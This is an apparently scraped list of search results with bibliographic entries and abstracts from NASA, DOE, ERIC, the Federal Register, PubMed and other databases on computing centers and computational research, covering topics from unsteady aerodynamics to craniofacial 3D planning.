    1987-01-01

    The current scope, recent progress, and plans for research and development of computational methods for unsteady aerodynamics at the NASA Langley Research Center are reviewed. Both integral equations and finite difference methods for inviscid and viscous flows are discussed. Although the great bulk of the effort has focused on finite difference solution of the transonic small perturbation equation, the integral equation program is given primary emphasis here because it is less well known.

  5. Development of computational methods for unsteady aerodynamics at the NASA Langley Research Center

    NASA Technical Reports Server (NTRS)

    Yates, E. Carson, Jr.; Whitlow, Woodrow, Jr.

    1987-01-01

    The current scope, recent progress, and plans for research and development of computational methods for unsteady aerodynamics at the NASA Langley Research Center are reviewed. Both integral-equations and finite-difference method for inviscid and viscous flows are discussed. Although the great bulk of the effort has focused on finite-difference solution of the transonic small-perturbation equation, the integral-equation program is given primary emphasis here because it is less well known.

  6. Human Centered Computing for Mars Exploration

    NASA Technical Reports Server (NTRS)

    Trimble, Jay

    2005-01-01

    The science objectives are to determine the aqueous, climatic, and geologic history of a site on Mars where conditions may have been favorable to the preservation of evidence of prebiotic or biotic processes. Human Centered Computing is a development process that starts with users and their needs, rather than with technology. The goal is a system design that serves the user, where the technology fits the task and the complexity is that of the task not of the tool.

  7. Effect of solutes on the lattice parameters and elastic stiffness coefficients of body-centered tetragonal Fe

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Fellinger, Michael R.; Hector, Jr., Louis G.; Trinkle, Dallas R.

    In this study, we compute changes in the lattice parameters and elastic stiffness coefficients C ij of body-centered tetragonal (bct) Fe due to Al, B, C, Cu, Mn, Si, and N solutes. Solute strain misfit tensors determine changes in the lattice parameters as well as strain contributions to the changes in the C ij. We also compute chemical contributions to the changes in the C ij, and show that the sum of the strain and chemical contributions agree with more computationally expensive direct calculations that simultaneously incorporate both contributions. Octahedral interstitial solutes, with C being the most important addition inmore » steels, must be present to stabilize the bct phase over the body-centered cubic phase. We therefore compute the effects of interactions between interstitial C solutes and substitutional solutes on the bct lattice parameters and C ij for all possible solute configurations in the dilute limit, and thermally average the results to obtain effective changes in properties due to each solute. Finally, the computed data can be used to estimate solute-induced changes in mechanical properties such as strength and ductility, and can be directly incorporated into mesoscale simulations of multiphase steels to model solute effects on the bct martensite phase.« less

  8. Heart CT scan

    MedlinePlus

    ... Computed tomography scan - heart; Calcium scoring; Multi-detector CT scan - heart; Electron beam computed tomography - heart; Agatston ... table that slides into the center of the CT scanner. You will lie on your back with ...

  9. 78 FR 68462 - Center for Scientific Review; Notice of Closed Meetings

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-11-14

    ... personal privacy. Name of Committee: Center for Scientific Review Special Emphasis Panel; Brain Injury and... Methodologies Integrated Review Group; Biomedical Computing and Health Informatics Study Section. Date: December...

  10. IUWare and Computing Tools: Indiana University's Approach to Low-Cost Software.

    ERIC Educational Resources Information Center

    Sheehan, Mark C.; Williams, James G.

    1987-01-01

    Describes strategies for providing low-cost microcomputer-based software for classroom use on college campuses. Highlights include descriptions of the software (IUWare and Computing Tools); computing center support; license policies; documentation; promotion; distribution; staff, faculty, and user training; problems; and future plans. (LRW)

  11. Adaptive Mesh Experiments for Hyperbolic Partial Differential Equations

    DTIC Science & Technology

    1990-02-01

    JOSEPH E. FLAHERTY FEBRUARY 1990 US ARMY ARMAMENT RESEARCH , ~ DEVELOPMENT AND ENGINEERlING CENTER CLOSE COMBAT ARMAMENTS CENTER BENET LABORATORIES...NY 12189-4050 If. CONTROLLING OFFICE NAME AND ADDRESS 12. REPORT DATE U.S. Army ARDEC February 1990 Close Combat Armaments Center 13. NUMBER OF...Flaherty Department of Computer Science Rensselaer Polytechnic Institute Troy, NY 12180-3590 and U.S. Army ARDEC Close Combat Armaments Center Benet

  12. Commercial Pilot Knowledge Test Guide

    DOT National Transportation Integrated Search

    1995-01-01

    The FAA has available hundreds of computer testing centers nationwide. These testing centers offer the full range of airman knowledge tests including military competence, instrument foreign pilot, and pilot examiner predesignated tests. Refer to appe...

  13. ARC-2009-ACD09-0208-029

    NASA Image and Video Library

    2009-09-15

    Obama Administration launches Cloud Computing Initiative at Ames Research Center. Vivek Kundra, White House Chief Federal Information Officer (right) and Lori Garver, NASA Deputy Administrator (left) get a tour & demo NASAS Supercomputing Center Hyperwall.

  14. 76 FR 24036 - Center for Scientific Review; Notice of Closed Meetings

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-04-29

    ... personal privacy. Name of Committee: Center for Scientific Review Special Emphasis Panel, Brain Disorders... Integrated Review Group, Biomedical Computing and Health Informatics Study Section. Date: June 7-8, 2011...

  15. Instrument Rating Knowledge Test Guide

    DOT National Transportation Integrated Search

    1995-01-01

    The FAA has available hundreds of computer testing centers nationwide. These testing centers offer the full range of airman knowledge tests including military competence, instrument foreign pilot, and pilot examiner predesignated tests. Refer to appe...

  16. Network Computer Technology. Phase I: Viability and Promise within NASA's Desktop Computing Environment

    NASA Technical Reports Server (NTRS)

    Paluzzi, Peter; Miller, Rosalind; Kurihara, West; Eskey, Megan

    1998-01-01

    Over the past several months, major industry vendors have made a business case for the network computer as a win-win solution toward lowering total cost of ownership. This report provides results from Phase I of the Ames Research Center network computer evaluation project. It identifies factors to be considered for determining cost of ownership; further, it examines where, when, and how network computer technology might fit in NASA's desktop computing architecture.

  17. Displaying Computer Simulations Of Physical Phenomena

    NASA Technical Reports Server (NTRS)

    Watson, Val

    1991-01-01

    Paper discusses computer simulation as means of experiencing and learning to understand physical phenomena. Covers both present simulation capabilities and major advances expected in near future. Visual, aural, tactile, and kinesthetic effects used to teach such physical sciences as dynamics of fluids. Recommends classrooms in universities, government, and industry be linked to advanced computing centers so computer simulations integrated into education process.

  18. Association of Small Computer Users in Education (ASCUE) Summer Conference Proceedings (30th, North Myrtle Beach, South Carolina, June 7-12, 1997).

    ERIC Educational Resources Information Center

    Smith, Peter, Ed.

    Papers from a conference on small college computing issues are: "An On-line Microcomputer Course for Pre-service Teachers" (Mary K. Abkemeier); "The Mathematics and Computer Science Learning Center (MLC)" (Solomon T. Abraham); "Multimedia for the Non-Computer Science Faculty Member" (Stephen T. Anderson, Sr.); "Achieving Continuous Improvement:…

  19. Computer Self-Efficacy, Computer Anxiety, and Attitudes toward the Internet: A Study among Undergraduates in Unimas

    ERIC Educational Resources Information Center

    Sam, Hong Kian; Othman, Abang Ekhsan Abang; Nordin, Zaimuarifuddin Shukri

    2005-01-01

    Eighty-one female and sixty-seven male undergraduates at a Malaysian university, from seven faculties and a Center for Language Studies completed a Computer Self-Efficacy Scale, Computer Anxiety Scale, and an Attitudes toward the Internet Scale and give information about their use of the Internet. This survey research investigated undergraduates'…

  20. 75 FR 75393 - Schools and Libraries Universal Service Support Mechanism and A National Broadband Plan for Our...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2010-12-03

    ... anchors, both as centers for digital literacy and as hubs for access to public computers. While their... expansion of computer labs, and facilitated deployment of new educational applications that would not have... computer fees to help defray the cost of computers or training fees to help cover the cost of training...

  1. Computational Science | NREL

    Science.gov Websites

    Science Photo of person viewing 3D visualization of a wind turbine The NREL Computational Science challenges in fields ranging from condensed matter physics and nonlinear dynamics to computational fluid dynamics. NREL is also home to the most energy-efficient data center in the world, featuring Peregrine-the

  2. Delivering The Benefits of Chemical-Biological Integration in Computational Toxicology at the EPA (ACS Fall meeting)

    EPA Science Inventory

    Abstract: Researchers at the EPA’s National Center for Computational Toxicology integrate advances in biology, chemistry, and computer science to examine the toxicity of chemicals and help prioritize chemicals for further research based on potential human health risks. The intent...

  3. A Serious Game of Success

    ERIC Educational Resources Information Center

    Nikirk, Martin

    2006-01-01

    This article discusses a computer game design and animation pilot at Washington County Technical High School as part of the advanced computer applications completer program. The focus of the instructional program is to teach students the 16 components of computer game design through a team-centered, problem-solving instructional format. Among…

  4. Some Measurement and Instruction Related Considerations Regarding Computer Assisted Testing.

    ERIC Educational Resources Information Center

    Oosterhof, Albert C.; Salisbury, David F.

    The Assessment Resource Center (ARC) at Florida State University provides computer assisted testing (CAT) for approximately 4,000 students each term. Computer capabilities permit a small proctoring staff to administer tests simultaneously to large numbers of students. Programs provide immediate feedback for students and generate a variety of…

  5. 78 FR 48169 - Privacy Act of 1974; CMS Computer Match No. 2013-02; HHS Computer Match No. 1306; DoD-DMDC Match...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-08-07

    ...), Defense Manpower Data Center (DMDC) and the Office of the Assistant Secretary of Defense (Health Affairs.../TRICARE. DMDC will receive the results of the computer match and provide the information to TMA for use in...

  6. Introduction to the theory of machines and languages

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Weidhaas, P. P.

    1976-04-01

    This text is intended to be an elementary ''guided tour'' through some basic concepts of modern computer science. Various models of computing machines and formal languages are studied in detail. Discussions center around questions such as, ''What is the scope of problems that can or cannot be solved by computers.''

  7. Management Needs for Computer Support.

    ERIC Educational Resources Information Center

    Irby, Alice J.

    University management has many and varied needs for effective computer services in support of their processing and information functions. The challenge for the computer center managers is to better understand these needs and assist in the development of effective and timely solutions. Management needs can range from accounting and payroll to…

  8. Computer Training for Early Childhood Educators.

    ERIC Educational Resources Information Center

    Specht, Jacqueline; Wood, Eileen; Willoughby, Teena

    Recent research in early childhood education (ECE) centers suggests that some teacher characteristics are not at a level that would support computer learning opportunities for children. This study identified areas of support required by teachers to provide a smooth introduction of the computer into the early childhood education classroom.…

  9. Administration of Computer Resources.

    ERIC Educational Resources Information Center

    Franklin, Gene F.

    Computing at Stanford University has, until recently, been performed at one of five facilities. The Stanford hospital operates an IBM 370/135 mainly for administrative use. The university business office has an IBM 370/145 for its administrative needs and support of the medical clinic. Under the supervision of the Stanford Computation Center are…

  10. Computer Conferencing: Distance Learning That Works.

    ERIC Educational Resources Information Center

    Norton, Robert E.; Stammen, Ronald M.

    This paper reports on a computer conferencing pilot project initiated by the Consortium for the Development of Professional Materials for Vocational Education and developed at the Center on Education and Training for Employment at Ohio State University. The report provides an introduction to computer conferencing and describes the stages of the…

  11. 75 FR 54162 - Privacy Act of 1974

    Federal Register 2010, 2011, 2012, 2013, 2014

    2010-09-03

    ... Program A. General The Computer Matching and Privacy Protection Act of 1988 (Pub. L. 100-503), amended the... DEPARTMENT OF HEALTH AND HUMAN SERVICES Centers for Medicare and Medicaid Services [CMS Computer Match No. 2010-01; HHS Computer Match No. 1006] Privacy Act of 1974 AGENCY: Department of Health and...

  12. Presentation Software and the Single Computer.

    ERIC Educational Resources Information Center

    Brown, Cindy A.

    1998-01-01

    Shows how the "Kid Pix" software and a single multimedia computer can aid classroom instruction for kindergarten through second grade. Topics include using the computer as a learning center for small groups of students; making a "Kid Pix" slide show; using it as an electronic chalkboard; and creating curriculum-related…

  13. 78 FR 63196 - Privacy Act System of Records

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-10-23

    ... Technology Center (ITC) staff and contractors, who maintain the FCC's computer network. Other FCC employees... and Offices (B/ Os); 2. Electronic data, records, and files that are stored in the FCC's computer.... Access to the FACA electronic records, files, and data, which are housed in the FCC's computer network...

  14. Should Professors Ban Laptops?

    ERIC Educational Resources Information Center

    Carter, Susan Payne; Greenberg, Kyle; Walker, Michael S.

    2017-01-01

    Laptop computers have become commonplace in K-12 and college classrooms. With that, educators now face a critical decision. Should they embrace computers and put technology at the center of their instruction? Should they allow students to decide for themselves whether to use computers during class? Or should they ban screens altogether and embrace…

  15. Computational Nanotechnology at NASA Ames Research Center, 1996

    NASA Technical Reports Server (NTRS)

    Globus, Al; Bailey, David; Langhoff, Steve; Pohorille, Andrew; Levit, Creon; Chancellor, Marisa K. (Technical Monitor)

    1996-01-01

    Some forms of nanotechnology appear to have enormous potential to improve aerospace and computer systems; computational nanotechnology, the design and simulation of programmable molecular machines, is crucial to progress. NASA Ames Research Center has begun a computational nanotechnology program including in-house work, external research grants, and grants of supercomputer time. Four goals have been established: (1) Simulate a hypothetical programmable molecular machine replicating itself and building other products. (2) Develop molecular manufacturing CAD (computer aided design) software and use it to design molecular manufacturing systems and products of aerospace interest, including computer components. (3) Characterize nanotechnologically accessible materials of aerospace interest. Such materials may have excellent strength and thermal properties. (4) Collaborate with experimentalists. Current in-house activities include: (1) Development of NanoDesign, software to design and simulate a nanotechnology based on functionalized fullerenes. Early work focuses on gears. (2) A design for high density atomically precise memory. (3) Design of nanotechnology systems based on biology. (4) Characterization of diamonoid mechanosynthetic pathways. (5) Studies of the laplacian of the electronic charge density to understand molecular structure and reactivity. (6) Studies of entropic effects during self-assembly. Characterization of properties of matter for clusters up to sizes exhibiting bulk properties. In addition, the NAS (NASA Advanced Supercomputing) supercomputer division sponsored a workshop on computational molecular nanotechnology on March 4-5, 1996 held at NASA Ames Research Center. Finally, collaborations with Bill Goddard at CalTech, Ralph Merkle at Xerox Parc, Don Brenner at NCSU (North Carolina State University), Tom McKendree at Hughes, and Todd Wipke at UCSC are underway.

  16. Applications of Computer Technology in Complex Craniofacial Reconstruction.

    PubMed

    Day, Kristopher M; Gabrick, Kyle S; Sargent, Larry A

    2018-03-01

    To demonstrate our use of advanced 3-dimensional (3D) computer technology in the analysis, virtual surgical planning (VSP), 3D modeling (3DM), and treatment of complex congenital and acquired craniofacial deformities. We present a series of craniofacial defects treated at a tertiary craniofacial referral center utilizing state-of-the-art 3D computer technology. All patients treated at our center using computer-assisted VSP, prefabricated custom-designed 3DMs, and/or 3D printed custom implants (3DPCI) in the reconstruction of craniofacial defects were included in this analysis. We describe the use of 3D computer technology to precisely analyze, plan, and reconstruct 31 craniofacial deformities/syndromes caused by: Pierre-Robin (7), Treacher Collins (5), Apert's (2), Pfeiffer (2), Crouzon (1) Syndromes, craniosynostosis (6), hemifacial microsomia (2), micrognathia (2), multiple facial clefts (1), and trauma (3). In select cases where the available bone was insufficient for skeletal reconstruction, 3DPCIs were fabricated using 3D printing. We used VSP in 30, 3DMs in all 31, distraction osteogenesis in 16, and 3DPCIs in 13 cases. Utilizing these technologies, the above complex craniofacial defects were corrected without significant complications and with excellent aesthetic results. Modern 3D technology allows the surgeon to better analyze complex craniofacial deformities, precisely plan surgical correction with computer simulation of results, customize osteotomies, plan distractions, and print 3DPCI, as needed. The use of advanced 3D computer technology can be applied safely and potentially improve aesthetic and functional outcomes after complex craniofacial reconstruction. These techniques warrant further study and may be reproducible in various centers of care.

  17. For operation of the Computer Software Management and Information Center (COSMIC)

    NASA Technical Reports Server (NTRS)

    Carmon, J. L.

    1983-01-01

    Computer programs for relational information management data base systems, spherical roller bearing analysis, a generalized pseudoinverse of a rectangular matrix, and software design and documentation language are summarized.

  18. NREL Evaluates Aquarius Liquid-Cooled High-Performance Computing Technology

    Science.gov Websites

    HPC and influence the modern data center designer towards adoption of liquid cooling. Our shared technology. Aquila and Sandia chose NREL's HPC Data Center for the initial installation and evaluation because the data center is configured for liquid cooling, along with the required instrumentation to

  19. NASA propagation information center

    NASA Technical Reports Server (NTRS)

    Smith, Ernest K.; Flock, Warren L.

    1990-01-01

    The NASA Propagation Information Center became formally operational in July 1988. It is located in the Department of Electrical and Computer Engineering of the University of Colorado at Boulder. The center is several things: a communications medium for the propagation with the outside world, a mechanism for internal communication within the program, and an aid to management.

  20. "Hack" Is Not A Dirty Word--The Tenth Anniversary of Patron Access Microcomputer Centers in Libraries.

    ERIC Educational Resources Information Center

    Dewey, Patrick R.

    1986-01-01

    The history of patron access microcomputers in libraries is described as carrying on a tradition that information and computer power should be shared. Questions that all types of libraries need to ask in planning microcomputer centers are considered and several model centers are described. (EM)

Top